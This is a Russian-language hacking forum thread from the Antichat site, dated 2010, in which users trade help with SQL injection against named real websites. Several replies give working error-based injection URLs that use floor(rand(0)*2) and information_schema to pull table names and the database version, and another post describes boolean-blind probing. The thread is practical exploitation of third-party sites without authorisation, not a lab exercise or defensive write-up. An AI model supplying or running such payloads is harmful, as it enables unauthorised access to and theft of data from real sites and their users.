Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.05.2010, 15:43
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
2geforce, с чего ты взял? Скуллы не вижу, либо мой браузер неверно отображает пагу (со смарта)
Последний раз редактировалось Bb0y; 16.05.2010 в 15:48..
|
|
|
16.05.2010, 17:42
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
собственно вопрос: можно как нибудь узнать полный путь к сайту если вывод ошибок отключен?
|
|
|
|
16.05.2010, 17:48
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.rokk.ru/index.php?cat=50&item=-21%20or%20(select%20count(*)from(select%201%20unio n%20select%202%20union%20select%203)x%20group%20by %20concat(mid((select%20table_name%20from%20inform ation_schema.tables%20limit%2019,1),1,20),floor(ra nd(0)*2)))
SESSION_STATUS1
тут что такое 1 ??
как убрать ?
|
|
|
|
16.05.2010, 17:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
SESSION_STATUS1
тут что такое 1 ??
как убрать ?
Зачем убирать? Просто не учитывать. А появляется из-за floor(rand(0)*2)
поставь floor(rand(0)*100) - будут другие циферьки
|
|
|
|
16.05.2010, 18:01
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
floor(rand(0)*100)>>Query error: Subquery returns more than 1 row
prosto xo4u imeno 1 ubrat ??
a kak ?
|
|
|
|
16.05.2010, 18:06
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от LokbatanLi
floor(rand(0)*100)>>Query error: Subquery returns more than 1 row
prosto xo4u imeno 1 ubrat ??
a kak ?
Код:
http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
...
PS: Включай уже логику, твой первый вопрос совсем никак не связан со вторым, не "почему 1", а "почему не могу раскрутить" тогда уж
Последний раз редактировалось Pashkela; 16.05.2010 в 18:12..
|
|
|
|
16.05.2010, 18:25
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Привет всем.
есть сайт с sql-inj котрые не выдает ошибку но пишет верно или не верно запрос проведен (0 или 1)
Если делаю 1'+and+1=1--+ то выдает 1
Если 1'+and+1=2--+ То 0
Проблема в том что я не могу воспользоваться конструкцией 1'+group+by+1--+ (ну или другое число допустим 50) всегда возвращает 0
Есть вероятность что это MsSQL
как мне быть, что попробовать?
|
|
|
|
16.05.2010, 18:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
попробуй "ссылку в студию"
|
|
|
|
16.05.2010, 21:05
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215
Репутация:
0
|
|
Нужна помощь, собственно http://pocketbook.by/index.php?id=306+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15--+
А если ставишь минус перед 306, вылетает пустая страница, подскажите где я затупил )
|
|
|
|
16.05.2010, 21:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
